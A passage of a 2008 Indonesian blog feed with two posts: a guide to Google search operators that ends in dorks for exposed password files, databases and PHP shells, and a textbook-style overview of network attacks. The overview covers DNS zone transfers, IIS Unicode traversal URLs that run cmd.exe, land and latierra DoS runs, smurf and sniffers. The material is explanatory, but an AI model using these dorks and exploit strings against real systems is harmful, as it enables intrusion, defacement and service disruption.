mengabaikan pencarian dengan kata-kata umum seperti&lt;br /&gt;"how" dan "where". Jika kata-kata umum ini begitu penting, anda&lt;br /&gt;bisa menambahkan "+" didepan keyword tersebut.&lt;br /&gt;Keyword: hacker how ==&gt; Kata "how" akan diabaikan&lt;br /&gt;Keyword: hacker +how ==&gt; Kata "how" akan diikutsertakan&lt;br /&gt;&lt;br /&gt;- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata&lt;br /&gt;tertentu dalam pencarian. Misal kita ingin mencari kata&lt;br /&gt;"linus tanpa linux", kita bisa menggunakan "linus -linux"&lt;br /&gt;&lt;br /&gt;- *: Google tidak mendukung pencarian * sebagai pengganti huruf.&lt;br /&gt;Misalkan kita ingin mencari dengan kata depan menja*&lt;br /&gt;Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll&lt;br /&gt;Google akan menghasilkan pencarian hanya yang mengandung kata&lt;br /&gt;"menja".&lt;br /&gt;&lt;br /&gt;Tetapi google mendukung penggunaan * dalam pencarian kalimat.&lt;br /&gt;Keyword: "menjadi * hacker"&lt;br /&gt;Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",&lt;br /&gt;"menjadi white hacker", dll.&lt;br /&gt;&lt;br /&gt;- "": Dapat digunakan untuk mencari kata yg lengkap.&lt;br /&gt;Keyword: "menjadi hacker"&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi hacker"&lt;br /&gt;&lt;br /&gt;- ?: Dapat digunakan untuk mencari pada direktori Google&lt;br /&gt;Keyword: ?intitle:index.of? mp3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 02 // Operator Spesial -----------------------------------------------&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;Google --&gt; Judul&lt;br /&gt;... Language Tools. Ways to help with tsunami relief \&lt;br /&gt;Advertising Programs - About Google &amp;#169;2005 Google - &gt; Deskripsi&lt;br /&gt;Searching 8,058,044,651 web pages. /&lt;br /&gt;www.google.com/ - 3k - 5 Jan 2005 --&gt; URL&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- intitle: Untuk mencari kata-kata dari judul suatu halaman web.&lt;br /&gt;Keyword: intitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman "Admin" dengan&lt;br /&gt;deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allintitle: Untuk mencari kata-kata dari judul halaman web&lt;br /&gt;secara lengkap.&lt;br /&gt;Keyword: allintitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman yang mengandung&lt;br /&gt;kata "Admin" dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: inurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dengan deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: allinurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- site: Untuk mencari dalam suatu situs tertentu saja&lt;br /&gt;Keyword: site:echo.or.id&lt;br /&gt;Semua pencarian hanya berdasarkan site "echo.or.id"&lt;br /&gt;&lt;br /&gt;- cache: Ketika Googlebot mengindeks suatu situs, google akan&lt;br /&gt;mengambil snapshot dari semua halaman yang telah terindeks.&lt;br /&gt;Operator ini membantu melihat halaman-halaman yang telah&lt;br /&gt;dicache.&lt;br /&gt;Keyword: cache:echo.or.id&lt;br /&gt;Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya&lt;br /&gt;pada snapshot/cache yang disimpan oleh Google.&lt;br /&gt;&lt;br /&gt;- define: Operator ini digunakan untuk mencari definisi dari frasa&lt;br /&gt;tertentu. Semua kata yang diketik setelah operator ini akan&lt;br /&gt;diperlakukan sebagai satu frasa.&lt;br /&gt;Keyword: define:hacker&lt;br /&gt;&lt;br /&gt;- filetype: Jika kita mencari jenis file tertentu yang berisi informasi&lt;br /&gt;yang anda inginkan kita bisa menggunakan operator ini.&lt;br /&gt;Keyword: "hacker" filetype:pdf&lt;br /&gt;Sampai tulisan ini dibuat google support tipe file&lt;br /&gt;# Adobe Portable Document Format (pdf)&lt;br /&gt;# Adobe PostScript (ps)&lt;br /&gt;# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)&lt;br /&gt;# Lotus WordPro (lwp)&lt;br /&gt;# MacWrite (mw)&lt;br /&gt;# Microsoft Excel (xls)&lt;br /&gt;# Microsoft PowerPoint (ppt)&lt;br /&gt;# Microsoft Word (doc)&lt;br /&gt;# Microsoft Works (wks, wps, wdb)&lt;br /&gt;# Microsoft Write (wri)&lt;br /&gt;# Rich Text Format (rtf)&lt;br /&gt;# Shockwave Flash (swf)&lt;br /&gt;# Text (ans, txt)&lt;br /&gt;Ref: http://www.google.com/help/faq_filetypes.html&lt;br /&gt;&lt;br /&gt;- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa&lt;br /&gt;menggunakan operator link.&lt;br /&gt;Keyword: link:www.google.com&lt;br /&gt;&lt;br /&gt;- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.&lt;br /&gt;Keyword: related:www.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 03 // Manipulasi URL Google ------------------------------------------&lt;br /&gt;&lt;br /&gt;&gt; And bisa mengganti interface google dengan mengganti variabel hl&lt;br /&gt;(default google hl=en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=id&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini&lt;br /&gt;dilakukan dengan modifikasi variabel lr.&lt;br /&gt;(default google lr=lang_en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita hasil pencarian hanya bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=lang_id&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Secara default google akan menampilkan 10 site perhalaman. Anda dapat&lt;br /&gt;mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel&lt;br /&gt;num pada URL :D&lt;br /&gt;Penggunaan num antara 1-100&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?num=100&amp;amp;hl=en&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini&lt;br /&gt;digunakan menentukan hasil berdasarkan bulan. x antara 1-12&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;as_qdr=m1&amp;amp;q=site%3Aecho.or.id&amp;amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"&lt;br /&gt;untuk memfilter hasil pencarian sexual.&lt;br /&gt;&lt;br /&gt;Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer&lt;br /&gt;sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih&lt;br /&gt;dahulu (kecuali anda menggunakan brwoser yang support google secara built-in&lt;br /&gt;atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat&lt;br /&gt;bandwidth ke luar negeri :D&lt;br /&gt;Karena bandwidth di Indonesia mahal ........&lt;br /&gt;&lt;br /&gt;Contoh script google.html lengkap dengan varabielnya.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form name="f" action="http://www.google.com/search"&gt;&lt;br /&gt;Variabel num: &lt;input value="10" name="num"&gt;&lt;br /&gt;&lt;br /&gt;Variabel hl: &lt;input value="en" name="hl"&gt;&lt;br /&gt;&lt;br /&gt;Variabel lr: &lt;input value="lang_id" name="lr"&gt;&lt;br /&gt;&lt;br /&gt;Variabel as_qdr: &lt;input value="m12" name="as_qdr"&gt;&lt;br /&gt;&lt;br /&gt;Variabel safe: &lt;input value="off" name="safe"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input maxlength="256" size="55" name="q"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input type="submit" value="Google Search" name="btnG"&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau&lt;br /&gt;menambahkan apapun disana. Semuanya terserah kepada anda :D&lt;br /&gt;Berikut merupakan script default pencarian google.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form name="f" action="http://www.google.com/search"&gt;&lt;br /&gt;&lt;input maxlength="256" size="55" name="q"&gt;&lt;br /&gt;&lt;br /&gt;&lt;input type="submit" value="Google Search" name="btnG"&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;Google masih terus dikembangkan. Untuk melihat apa yang sedang&lt;br /&gt;dikembangkan Google. Anda bisa ke http://labs.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 04 // Tips &amp;amp; Tricks --------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan&lt;br /&gt;operator-operator tersebut.&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian&lt;br /&gt;anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan&lt;br /&gt;semua site echo.or.id yang mengandung kata hacker.&lt;br /&gt;&lt;br /&gt;Kita juga dapat melakukan pencarian secara spesifik melalui google.&lt;br /&gt;Untuk melakukannya anda dapat ke site berikut:&lt;br /&gt;- http://www.google.com/bsd&lt;br /&gt;- http://www.google.com/mac&lt;br /&gt;- http://www.google.com/linux&lt;br /&gt;- http://www.google.com/microsoft&lt;br /&gt;- http://www.google.com/univ/education&lt;br /&gt;&lt;br /&gt;Berbagai trik keyword pada Google:&lt;br /&gt;parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;&lt;br /&gt;intitle:index of intitle:mp3 -html -htm name size&lt;br /&gt;intitle:index of intitle:video -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin passwd -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin password -html -htm name size&lt;br /&gt;&lt;br /&gt;inurl:"admin.mdb" -html&lt;br /&gt;inurl:"password.mdb" -html&lt;br /&gt;inurl:"data.mdb" -html&lt;br /&gt;"phpMyAdmin" "running on" inurl:"main.php"&lt;br /&gt;intitle:"PHP Shell" "Enable stderr" php&lt;br /&gt;&lt;br /&gt;Masih banyak lagi keyword yang bisa ditemukan disini [5] :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 05 // Referensi ------------------------------------------------------&lt;br /&gt;&lt;br /&gt;[1] http://www.google.com/help/basics.html&lt;br /&gt;[2] http://www.google.com/help/features.html&lt;br /&gt;[3] http://www.google.com/help/refinesearch.html&lt;br /&gt;[4] http://www.google.com/help/interpret.html&lt;br /&gt;[5] http://johnny.ihackstuff.com/&lt;br /&gt;[6] O'Reilly - Google Hacks&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-1322272385030846110?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/1322272385030846110/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=1322272385030846110&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/1322272385030846110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/1322272385030846110'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/google-hack.html' title='google hack'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-6568183127493419262</id><published>2008-02-01T03:28:00.000-08:00</published><updated>2008-06-29T04:03:38.364-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='networking'/><title type='text'>Eksploitasi keamanan jaringan</title><content type='html'>Eksploitasi keamanan jaringan &lt;br /&gt; Yang MoSTiNG 18NuX THe BRiGHTSiDe   Jam 11:16          &lt;br /&gt;Dalam bagian ini akan dibahas beberapa contoh eksploitasi lubang keamanan. Contoh-contoh yang dibahas ada yan bersifat umum dan ada yang bersifat khusus untuk satu jenis operating system tertentu, atau untuk program tertentu dengan versi tertentu. Biasanya lubang keamanan ini sudah ditutup pada versi baru dari paket program tersebut sehingga mungkin tidak dapat anda coba. Pembahasan dalam bab ini tentunya tidak komplit dikarenakan batasan jumlah halaman. Jika diinginkan pembahasan yang lebih komplit ada buku “Hacking Exposed” (lihat referensi [36]) yang dapat digunakan untuk keperluan tersebut. &lt;br /&gt; Menurut “Hacking Exposed”, metodologi dari penyusup biasanya mengikuti langkah sebagai berikut: • Target acquisition and information gaterhing • Initial access • Privilege escalation • Covering tracks&lt;br /&gt; Namun, bagian ini belum disusun dengan urutan seperti di atas. Sebelum melakukan penyerangan, seorang cracker biasanya mencari informasi tentang targetnya. Banyak informasi tentang sebuah sistem yang dapat diperoleh dari Internet. Sebagai contoh, informasi dari DNS (Domain Name System) kadang-kadang terlalu berlebihan sehingga memberikan terlalu banyak informasi kepada orang yang bermaksud jahat. DNS dapat memberikan informasi tentang nama-nama server berserta nomor IP yang dimiliki oleh sebuah perusahaan. Seseorang yang tidak tahu apa-apa, dengan mengetahui domain dari sebuah perusahaan dapat mengetahui informasi yang lebih banyak tentang server-server dari perusahaan tersebut. Paling tidak, informasi tentang name server merupakan informasi awal yang dapat berguna.&lt;br /&gt; Informasi tentang DNS tersedia secara terbuka di Internet dan dapat dicari dengan menggunakan berbagai tools seperti: • whois, host, nslookup, dig (tools di sistem UNIX) • Sam Spade (tools di sistem Windows) • web dari Network Solutions inc. yang menyediakan informasi tentang data-data gTLD (.com, .net, .org, dan seterusnya) melalui webnya di  http://www.networksolutions.com &lt;br /&gt;Host, Whois, dig Berikut ini adalah contoh beberapa session untuk mencari informasi tentang domain dan server-server yang digunakan oleh domain tersebut. Untuk mencari name server, dapat digunakan program “host” dengan option “-t ns”. Sementara itu untuk mencari nomor IP dari sebuah host, langsun gunakan program host tanpa option. unix$ host -t ns yahoo.com yahoo.com NS NS3.EUROPE.yahoo.com yahoo.com NS NS1.yahoo.com yahoo.com NS NS5.DCX.yahoo.com unix$ host ns1.yahoo.com&lt;br /&gt; ns1.yahoo.com A 204.71.200.33 Cara yang sama dapat dilakukan dengan menggunakan program whois. Contoh di bawah ini adalah untuk mencari informasi tentang domain yahoo.com dengan menggunakan server whois yang berada di Network Solutions Inc. unix$ whois -h whois.networksolutions.com yahoo.com Registrant: Yahoo (YAHOO-DOM) 3420 Central Expressway Santa Clara, CA 95051 US Domain Name: YAHOO.COM Administrative Contact, Technical Contact: Balling, Derek (DJB470) tech-contact@YAHOO-INC.COM Yahoo! 701 First Ave Sunnyvale, CA 94089 US +1-408-349-5062 Billing Contact: Billing, Domain (DB28833) domainbilling@YAHOO-INC.COM Yahoo! Inc. 225 Broadway, 13th Floor San Diego, CA 92101 1-408-731-3300 Record last updated on 28-Jun-2001. Record expires on 20-Jan-2010. Record created on 18-Jan-1995. Database last updated on 20-Jul-2001 00:12:00 EDT. Domain servers in listed order: NS1.YAHOO.COM 204.71.200.33 NS5.DCX.YAHOO.COM 216.32.74.10 NS3.EUROPE.YAHOO.COM 217.12.4.71 Informasi yang diperoleh dari contoh di atas sekedar mencari informasi mengenai server DNS. Kita juga dapat mencoba mencari informasi lebih jauh dengan cara mengambil (dump) semua data-data DNS yang dikenal dengan istilah zone transfer. Program “dig” dapat kita gunakan untuk keperluan tersebut.&lt;br /&gt; unix$ dig yahoo.com. axfr @ns1.yahoo.com. &lt;br /&gt; Contoh di atas adalah perintah untuk melakukan zone transfer (axfr) terhadap domain yahoo.com dari server ns1.yahoo.com. Perhatikan tanda titik (.) di belakang nama domain. Perlu diingat bahwa kegiatan zone transfer di beberapa tempat dapat dikategorikan sebagai tidak ramah (unfriendly) dan bahkan dianggak sebagai usaha untuk melakukan hacking terhadap sistem tersebut.&lt;br /&gt; Untuk sistem yang diamankan secara baik, perintah zone transfer di atas akan gagal untuk dilakukan. Akan tetapi untuk sistem yang tidak baik, perintah di atas akan memberikan informasi tentang nama server-server yang berada dalam domain tersebut. Termasuk server di Intranet! (seperti billing, terminal server, RAS, dan sebagainya). Informasi yang sensitif seperti ini seharusnya tidak dapat di-query oleh orang atau server yang tidak berhak. Query zone transfer ini juga dapat dijadikan DoS attack karena dengan query yang sedikit (berdasarkan jumlah dan ukuran paket yang dikirimkan) dia menghasilkan jawaban yang cukup panjang. Dengan kata lain terjadi amplifikasi dari penggunaan bandwidth jaringan. Periksa sistem anda apakah DNS anda sudah dikelola dengan baik atau masih terbuka untuk zone transfer.&lt;br /&gt;Sam Spade, utility untuk MS Windows Untuk anda yang menggunakan sistem yang berbasis Microsoft Windows, anda dapat menggunakan program Sam Spade. Program ini dapat diperoleh secara gratis dari web http://www.samspade.org. Gambar berikut menunjukkan sebuah sesi Sam Spade untuk mencari informasi tentang domain INDOCISC.com. Informasi DNS memang tersedia untuk umum. Akan tetapi seharusnya informasi yang komplit hanya boleh dilihat oleh server tertentu. Istilahnya, “zone transfer” hanya diperbolehkan untuk server tertentu saja. Eksploitasi Web Server Web server menyediakan jasa untuk publik. Dengan demikian dia harus berada di depan publik. Sayangnya banyak lubang keamanan dalam implementasi beberapa web server. Di bagian ini akan dicontohkan beberapa eksploitasi tersebut. &lt;br /&gt;Defacing Microsoft IIS Salah satu lubang keamanan dari web yang berbasis IIS adalah adanya program atau script yang kurang baik implementasinya. Sebagai contoh, bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah web server yang berbasis IIS. (Informasi lengkapnya ada di :&lt;br /&gt; http://www.securityfocus.com/bid/1806. &lt;br /&gt; http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir &lt;br /&gt; Perintah di atas menjalankan perintah “dir” untuk melihat direktori di &lt;br /&gt;server IIS tersebut. Selain melihat direktori dengan perintah “dir”, anda &lt;br /&gt;dapat jugamenjalankan perintah lain di server tersebut, seperti misalnya &lt;br /&gt;meng-copy file. Salah satu exploit adalah dengan mengambil file dari sebuah &lt;br /&gt;tempat dengan “TFTP” ke server IIS tersebut. Prinsipnya adalah menggunakan perintah yang command line sebagai perintah “dir” tersebut, seperti dnegan printah “tftp” dan menggantikan spasi dengan tanda tambah (+). Setelah itu, file dapat ditempatkan dimana saja termasuk di direktori yang digunakan untuk memberikan layanan web. Atau dengan kata lain web tersebut dapat diubah (deface). Denial of Service Attack “Denial of Service (DoS) attack” merupakan sebuah usaha (dalam bentuk serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem tersebut tidak dapat menyediakan servis-servisnya (denial of service) atau tingkat servis menurun dengan drastis. Cara untuk melumpuhkan dapat bermacam-macam dan akibatnyapun dapat beragam. Sistem yang diserang dapat menjadi “bengong” (hang, crash), tidak berfungsi, atau turun kinerjanya (beban CPU tinggi). Serangan denial of service berbeda dengan kejahatan pencurian data atau kejahatan memonitor informasi yang lalu lalang. Dalam serangan DoS tidak ada yang dicuri. Akan tetapi, serangan DoS dapat mengakibatkan kerugian finansial. Sebagai contoh apabila sistem yang diserang merupakan server yang menangani transaksi “commerce”, maka apabila server tersebut tidak berfungsi, transaksi tidak dapat dilangsungkan. Bayangkan apabila sebuah bank diserang oleh bank saingan dengan melumpuhkan outlet ATM (Anjungan Tunai Mandiri, Automatic Teller Machine) yang dimiliki oleh bank tersebut. Atau sebuah credit card merchant server yang diserang sehingga tidak dapat menerima pembayaran melalui credit card. Selain itu, serangan DoS sering digunakan sebagai bagian dari serangan lainnya. Misalnya, dalam serangan IPspoofing (seolah serangan datang dari tempat lain dengan nomor IP milik orang lain), seringkali DoS digunakan untuk membungkam server yang akan dispoof. &lt;br /&gt;Land attack Land attack merupakan serangan kepada sistem dengan menggunakan program yang bernama “land”. Apabila serangan diarahkan kepada sistem Windows 95, maka sistem yang tidak diproteksi akan menjadi hang (dan bisa keluar layar biru). Demikian pula apabila serangan diarahkan ke beberapa jenis UNIX versi lama, maka sistem akan hang. Jika serangan diarahkan ke sistem Windows NT, maka sistem akan sibuk dengan penggunaan CPU mencapai 100% untuk beberapa saat sehingga sistem terlihat seperti macet. Dapat dibayangkan apabila hal ini dilakukan secara berulang-ulang. Serangan land ini membutuhkan nomor IP dan nomor port dari server yang dituju. Untuk sistem Windows, biasanya port 139 yang digunakan untuk menyerang. Program land menyerang server yang dituju dengan mengirimkan packet palsu yang seolah-olah berasal dari server yang dituju. Dengan kata lain, source dan destination dari packet dibuat seakan-akan berasal dari server yang dituju. Akibatnya server yang diserang menjadi bingung. &lt;br /&gt; unix# ./land 192.168.1.1 139 land.c by m3lt, FLC 192.168.1.1:139 landed &lt;br /&gt;Latierra Program latierra merupakan “perbaikan” dari program land, dimana port yang digunakan berubah-ubah sehingga menyulitkan bagi pengamanan. latierra v1.0b by MondoMan (elmondo@usa.net), KeG Enhanced version of land.c originally developed by m3lt, FLC Arguments: * -i dest_ip = destination ip address such as 1.1.1.1 If last octet is '-', then the address will increment from 1 to 254 (Class C) on the next loop and loop must be &gt; 1 or -5 (forever). Alternatives = zone=filename.txt or list=filename.txt (ASCII) For list of alternative options, use -a instead of -h. * -b port# = beginning port number (required). -e port# = ending port number (optional) -t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a=ack,u=urgent) -v = time_to_live value, default=255 -p protocol = ~6=tcp, 17=udp, use -p option for complete list -w window_size = value from 0 to ?, default=65000 -q tcp_sequence_number, default=3868 -m message_type (~0=none, 1=Out-Of-Band, 4=Msg_DontRoute -s seconds = delay between port numbers, default=1 -o 1 = supress additional output to screen, default=0 -l loop = times to loop through ports/scan, default=1, -5=forever * = required ~ = default parameter values unix# ./latierra -i 192.167.1.1 -b 139 -e 141 &lt;br /&gt; latierra v1.0b by MondoMan (elmondo@usa.net), KeG Enhanced version of land.c originally developed by m3lt, FLC Settings: (-i) Dest. IP Addr : 192.168.1.1 (-b) Beginning Port #: 139 (-e) Ending Port # : 141 (-s) Seconds to Pause: 1 (-l) Loop : 1 (-w) Window size : 65000 (-q) Sequence Number : F1C (3868) (-v) Time-to-Live : 255 (-p) IP Protocol # : 6 (-t) TCP flags : syn push Done. &lt;br /&gt;Ping-o-death Ping-o-death sebetulnya adalah eksploitasi program ping dengan memberikan packet yang ukurannya besar ke sistem yang dituju. Beberapa sistem UNIX ternyata menjadi hang ketika diserang dengan cara ini. Program ping umum terdapat di berbagai operating system, meskipun umumnya program ping tersebut mengirimkan packet dengan ukuran kecil (tertentu) dan tidak memiliki fasilitas untuk mengubah besarnya packet. Salah satu implementasi program ping yang dapat digunakan untuk mengubah ukuran packet adalah program ping yang ada di sistem Windows 95. &lt;br /&gt;Ping broadcast (smurf) Salah satu mekanisme serangan yang baru-baru ini mulai marak digunakan adalah menggunakan ping ke alamat broadcast, ini yang sering disebut dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast tersebut akan menjawab. Apakah ini merupakan standar? Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon dari device-device tersebut. Akibatnya jaringan menjadi lambat. &lt;br /&gt; $ ping 192.168.1.255 PING 192.168.1.255 (192.168.1.255): 56 data bytes 64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms 64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms (DUP!) --- 192.168.1.255 ping statistics --- 4 packets transmitted, 4 packets received, +4 duplicates, 0% packet loss round-trip min/avg/max = 2.5/6.0/24.0 ms &lt;br /&gt; Smurf attack biasanya dilakukan dengan menggunakan IP spoofing, yaitu mengubah nomor IP dari datangnya request, tidak seperti contoh di atas. Dengan menggunakan IP spoofing, respon dari ping tadi dialamatkan ke komputer yang IPnya dispoof. Akibatnya komputer tersebut akan menerima banyak paket. Hal ini dapat mengakibatkan pemborosan penggunaan (bandwidth) jaringan yang menghubungkan komputer tersebut. Dapat dibayangkan apabila komputer yang dispoof tersebut memiliki hubungan yang berkecepatan rendah dan ping diarahkan ke sistem yang memiliki banyak host. Hal ini dapat mengakibatkan DoS attack. &lt;br /&gt; Contoh-contoh DoS attack lainnya • Program “ping.exe” di sistem Windows (dicobakan pada Windows NT 4 Service Pack 4) dapat digunakan untuk menghentikan beberapa aplikasi sistem Windows jika diberikan nama host yang panjangnya lebih dari 112 karakter. Aplikasi dialup akan mati. Eksploitasi ini membutuhkan user di local server.&lt;br /&gt;http://www.securitytracker.com/alerts/2001/Apr/1001255.html  Sniffer Program sniffer adalah program yang dapat digunakan untuk menyadap data dan informasi melalui jaringan komputer. Di tangan seorang admin, program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di jaringan atau untuk memantau adanya serangan. Di tangan cracker, program sniffer dapat digunakan untuk menyadap password (jika dikirimkan dalam bentuk clear text). &lt;br /&gt;Sniffit Program sniffit dijalankan dengan userid root (atau program dapat di-setuid root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data. Untuk contoh penggunaan sniffit, silahkan baca dokumentasi yang menyertainya. (Versi berikut dari buku ini akan menyediakan informasi tentang penggunaannya.) &lt;br /&gt;tcpdump Program tcpdump merupakan program gratis yang umum digunakan untuk menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga tersedia dengan nama windump. Setelah ditangkap, data-data (paket) ini dapat diolah dengan program lainnya, seperti dengan menggunakan program tcpshow, tcptrace, dan sejenisnya. Program tcpdump sangat powerful dan digunakan sebagai basis dari pembahasan di beberapa buku, seperti buku seri “TCP/IP Illustrated” dari Richard Stevens [41] yang sangat terkenal atau buku “Network Intrusion Detection” [28]. Berikut ini adalah contoh sebuah sesi tcpdump. &lt;br /&gt; unix# tcpdump 06:46:31.318893 192.168.1.7.1043 &gt; 192.168.1.1.80: S 616175183:616175183(0) win 5840 &lt;mss 1460,nop,nop,sackOK&gt; (DF) 06:46:31.318893 192.168.1.1.80 &gt; 192.168.1.7.1043: S 1312015909:1312015909(0) ack 616175184 win 32736 &lt;mss 1460&gt; 06:46:31.318893 192.168.1.7.1043 &gt; 192.168.1.1.80: . ack 1 win 5840 (DF) 06:46:31.318893 192.168.1.7.1043 &gt; 192.168.1.1.80: P 